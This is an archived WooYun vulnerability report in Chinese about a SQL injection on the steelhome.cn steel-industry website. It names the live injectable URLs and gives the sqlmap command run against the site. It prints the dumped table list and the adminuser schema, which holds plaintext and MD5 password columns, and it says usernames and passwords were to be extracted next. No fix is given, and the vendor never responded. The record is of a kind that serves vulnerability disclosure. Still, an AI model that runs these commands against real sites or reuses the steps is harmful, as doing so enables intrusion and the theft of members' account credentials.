当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095880

漏洞标题:钢之家钢铁网存在注入漏洞可获得所有企业会员账号密码等信息

相关厂商:钢之家

漏洞作者: ByStudent

提交时间:2015-04-15 17:37

修复时间:2015-05-30 17:38

公开时间:2015-05-30 17:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

钢之家钢铁网存在注入漏洞,可获得所有企业会员账号密码等信息

详细说明:

一、详细说明:
注入点http://www.steelhome.cn/MemberLogin.php?urlstr=http://news.steelhome.cn/2004/08/24/n10160.html
改变后放入sqlmap中去跑sqlmap.py -u http://www.steelhome.cn/MessageShow.php?nid=10160 --tables

Current database
[14 tables]
+------------+
| adminuser |
| banner |
| category |
| city |
| dealer |
| department |
| dept |
| member |
| news |
| product |
| province |
| report |
| service |
| tmp |
+------------+
然后跑下adminuserDatabase: steelhome
Table: adminuser
[47 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| addid | int(10) |
| address | varchar(500) |
| anonymity | varchar(30) |
| city | varchar(32) |
| dlpower | varchar(4) |
| dzstate | varchar(255) |
| email | varchar(50) |
| EmailSafe | tinyint(2) |
| fax | varchar(20) |
| FComID | int(11) |
| id | int(10) |
| isadmin | char(1) |
| IsClose | tinyint(4) |
| IsDZjyy | tinyint(3) |
| IsFCom | tinyint(4) |
| islogondzwz | tinyint(1) |
| ismaster | char(1) |
| isswt | int(11) |
| iswwz | char(1) |
| IsZwZx | tinyint(4) |
| Jystime | datetime |
| logonflag | tinyint(1) |
| mid | varchar(20) |
| mobil | varchar(30) |
| MobileSafe | tinyint(2) |
| password | varchar(20) |
| passwordmd5 | varchar(255) |
| pid | varchar(25) |
| post | varchar(20) |
| postcode | varchar(12) |
| power | varchar(100) |
| province | varchar(32) |
| pw_dx | int(1) |
| QQNum | varchar(15) |
| radio_master | varchar(10) |
| sex | char(1) |
| sms_u | int(11) |
| state | smallint(1) |
| swt_query_limit | int(11) |
| swt_show | tinyint(1) |
| swtsafe | tinyint(4) |
| tel | varchar(30) |
| TelSafe | tinyint(2) |
| truename | varchar(20) |
| username | varchar(20) |
| ytg_master | varchar(10) |
| zyflag | tinyint(4) |
+-----------------+--------------+


然后就是跑username 跟password了

漏洞证明:

f8138a8fb510509c41407cb85386450c.png

修复方案:

不知道,,

版权声明:转载请注明来源 ByStudent@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝